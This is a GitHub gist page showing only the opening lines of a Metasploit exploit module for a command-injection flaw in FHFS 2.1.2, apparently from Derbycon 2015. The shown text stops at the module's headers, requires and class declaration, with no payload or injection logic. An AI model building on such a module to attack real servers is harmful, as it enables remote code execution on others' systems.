Skip to content

Instantly share code, notes, and snippets.

@jmacko
jmacko / fhfs_cmd_exec.rb
Last active September 3, 2019 16:40
FHFS 2.1.2 Command Injection Exploit - Derbycon 2015
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking